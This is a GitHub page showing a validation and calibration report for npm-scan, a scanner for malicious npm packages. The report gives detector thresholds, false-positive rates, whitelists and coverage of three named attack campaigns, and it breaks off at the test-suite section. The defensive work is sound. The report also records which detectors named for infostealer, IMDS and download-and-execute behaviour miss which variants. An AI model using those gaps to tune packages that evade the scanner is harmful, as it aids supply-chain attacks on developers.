npm-scan/VALIDATION.md at main · lateos-ai/npm-scan · GitHub

//blob/show" data-turbo-transient="true" />

Skip to content

Search or jump to...

Search code, repositories, users, issues, pull requests...

-->

Search

Clear

Search syntax tips

Provide feedback

--><br>We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

Cancel

Submit feedback

Saved searches

Use saved searches to filter your results more quickly

-->

Name

Query

To see all available qualifiers, see our documentation.

Cancel

Create saved search

Sign in

//blob/show;ref_cta:Sign up;ref_loc:header logged out"}"<br>Sign up

Appearance settings

Resetting focus

You signed in with another tab or window. Reload to refresh your session.<br>You signed out in another tab or window. Reload to refresh your session.<br>You switched accounts on another tab or window. Reload to refresh your session.

Dismiss alert

{{ message }}

lateos-ai

npm-scan

Public

Notifications<br>You must be signed in to change notification settings

Fork

Star<br>12

FilesExpand file tree

main

/VALIDATION.md

Copy path

Blame<br>More file actions

Blame<br>More file actions

Latest commit

History<br>History<br>History

92 lines (74 loc) · 4.7 KB

main

/VALIDATION.md

Top

File metadata and controls<br>Preview

Code

Blame

92 lines (74 loc) · 4.7 KB

Raw<br>Copy raw file<br>Download raw file

OutlineEdit and raw actions

npm-scan Validation & Calibration Report

Date : 2026-06-03

Detectors Validated : TIER1-VERSION-ANOMALY, TIER1-OBFUSCATION-HEURISTICS, TIER1-LIFECYCLE-HOOK, TIER1-BINARY-EMBED, TIER1-TYPOSQUAT, TIER1-INFOSTEALER

Campaigns Tested : 3 real May 2026 attack vectors

Packages Analyzed : 7 (validation) + 1,000 (calibration)

Campaign Detection Rates

Campaign<br>Total<br>Detected<br>Rate<br>Expected<br>Matched<br>Match%

176-Package Dependency Confusion<br>100.0%<br>71.4%

Mini Shai-Hulud (Obfuscated)<br>100.0%<br>60.0%

Bitwarden CLI Impersonation<br>100.0%<br>60.0%

Every campaign package triggered at least one expected detector. Expected-match rate accounts for detectors that require file content (binary embed, infostealer exact patterns) not present in fixture metadata.

Detector Performance (Validation)

Detector<br>Hits<br>Expected<br>Precision<br>Avg Confidence

TIER1-LIFECYCLE-HOOK<br>100.0%<br>92.5

TIER1-VERSION-ANOMALY<br>100.0%<br>92.0

TIER1-OBFUSCATION-HEURISTICS<br>100.0%<br>80.0

TIER1-TYPOSQUAT<br>50.0%<br>68.8

Threshold Calibration

Pre-calibration : Global confidence threshold at 70

Post-calibration : Per-detector thresholds from analysis:

Detector<br>Flag<br>Warn<br>Calibration Basis

TIER1-TYPOSQUAT<br>85<br>70<br>46 edit-distance=1 FPs on scoped sub-packages eliminated at 85

TIER1-OBFUSCATION-HEURISTICS<br>75<br>60<br>Bundlers/transpilers exempt via whitelist

TIER1-VERSION-ANOMALY<br>72<br>60<br>Sentinel patterns always flag at 92

TIER1-BINARY-EMBED<br>80<br>65<br>Cross-platform binary sets rare in legit packages

TIER1-LIFECYCLE-HOOK<br>65<br>50<br>Moderate threshold for hooks

TIER1-INFOSTEALER<br>72<br>55<br>Pattern-based C2 signatures

TIER1-METADATA-SPOOF<br>70<br>55<br>Namespace/repo URL spoofing

TIER1-VERSION-CONFUSION<br>75<br>60<br>High-version heuristics

TIER1-CLOUD-IMDS<br>80<br>65<br>IMDS targeting rarely legitimate

TIER1-MULTISTAGE-POSTINSTALL<br>75<br>60<br>Two-stage download+exec

TIER1-SLSA-ATTESTATION<br>85<br>70<br>Placeholder

False Positive Calibration on Top 1,000 npm Packages :

Threshold 70: 47 FPs (4.7%) — all TIER1-TYPOSQUAT edit-distance=1 on scoped sub-packages

Threshold 76: 2 FPs (0.2%) — @commitlint/read + preact (both whitelisted)

Threshold 85: 0 FPs (0.0%) — well under 2% target

Whitelist Additions (10 packages, 4 detectors):

Bundlers/minifiers (webpack, terser, uglify-js, browserify, rollup, esbuild) → TIER1-OBFUSCATION-HEURISTICS

Transpilers (typescript, @babel/core) → TIER1-OBFUSCATION-HEURISTICS

Utility libs (lodash, underscore, crypto-js) → TIER1-OBFUSCATION-HEURISTICS

Date lib (moment) → TIER1-BINARY-EMBED

Scoped packages (preact, @commitlint/read) → TYPOSQUAT_VPMDHAJ / TIER1-TYPOSQUAT

Campaign Coverage Analysis

Campaign 1: Dependency Confusion (sentinel versions)

TIER1-VERSION-ANOMALY catches all three (99.99.99/11.11.11/10.10.10) at 92% confidence

TIER1-LIFECYCLE-HOOK fires on postinstall/preinstall scripts at 70-100%

TIER1-BINARY-EMBED does not fire (no binary files in fixture data)

Additional: TIER1-VERSION-CONFUSION fires at 85/65/65 (enhanced coverage)

Campaign 2: Mini Shai-Hulud (obfuscation)

TIER1-OBFUSCATION-HEURISTICS fires on both packages at 90% and 70%

TIER1-LIFECYCLE-HOOK fires on @antv/core at 100%

TIER1-INFOSTEALER does not fire (fixture scripts lack exact pattern signatures)

Additional: TIER1-TYPOSQUAT fires at 75-100%, MINI_SHAI_HULUD campaign detector fires

Campaign 3: Bitwarden Impersonation

TIER1-LIFECYCLE-HOOK fires on second wave at 100%

TIER1-TYPOSQUAT fires at 50% (below flag threshold of 85)

TIER1-OBFUSCATION-HEURISTICS does not fire on first wave (script not sufficiently obfuscated)

Additional: TRAPDOOR and TYPOSQUAT_VPMDHAJ detectors fire on second wave

Test Suite

690 total...